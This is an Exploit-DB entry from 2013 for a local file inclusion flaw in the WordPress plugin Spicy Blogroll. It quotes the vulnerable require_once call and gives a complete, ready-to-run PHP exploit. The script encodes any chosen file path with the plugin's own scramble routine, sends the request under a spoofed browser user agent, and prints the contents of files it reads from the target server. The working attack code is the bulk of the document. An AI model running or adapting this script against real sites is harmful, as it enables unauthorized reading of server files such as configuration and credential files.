WordPress Plugin Spicy Blogroll - Local File Inclusion

EDB-ID:

26804

CVE:





Platform:

PHP

Date:

2013-07-13


<?php 
// Title: Wordpress Plugin Spicy Blogroll File Inclusion Vulnerability
// Date: 12-07-2013 (GMT+8 Kuala Lumpur)
// Author: Ahlspiess
// Greetz: All TBDIAN - http://w3.tbd.my :)
// Screenshot: http://i.imgur.com/jIrUznC.png
/**
Details:
	File: /wp-content/plugins/spicy-blogroll-ajax.php
	SVN Source: http://svn.wp-plugins.org/spicy-blogroll/trunk/spicy-blogroll-ajax.php
<?php
...
...
	$link_url = $_GET['link_url'];
	$link_text = $_GET['link_text'];
	$var2 = unscramble($_GET['var2']);
	$var3 = unscramble($_GET['var3']);
	$var4 = unscramble($_GET['var4']);
	$var5 = unscramble($_GET['var5']);
	$nonce = unscramble($_GET['var11']);
	require_once($var2.$var4); <-- Boom
...
...
*/

if(!isset($argv[3])) {
	die(sprintf("php %s <host> <path> <file>\n", $argv[0]));
}

list(,$host, $path, $file) = $argv;
$vfile = 'http://%s%s/wp-content/plugins/spicy-blogroll/spicy-blogroll-ajax.php?var2=%s&var4=%s';
$request = sprintf($vfile, $host, $path, scramble(dirname($file) . "/"), scramble(basename($file)));
$opts = array(
	'http'=>array(
		'header'		=>	"User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:22.0) Gecko/20100101 Firefox/22.0",
		'ignore_errors'	=>	true,
	)
);

$context = stream_context_create($opts);
echo file_get_contents($request, 0, $context);

/**
	Source: http://svn.wp-plugins.org/spicy-blogroll/trunk/spicy-blogroll.php
	Line: 386-401
*/
function scramble($text1,$rng = 1){
	$len=strlen($text1);
	$rn=$rng%2;
	$count=7;
	$seed=($rn%=2)+1;
	$text2=chr($seed+64+$rng).chr($rng+70);
	for($i=0; $i<=$len-1; $i++) {
		$seed*=-1;
		$count+=1;
		$ch=ord(substr($text1,$i,1))+$seed;
		if($ch==92){$ch.=42;}
		$text2.=chr($ch);
	if($count%5==$rn){$text2.=chr(mt_rand(97,123));}
	}
	return $text2;
}

?>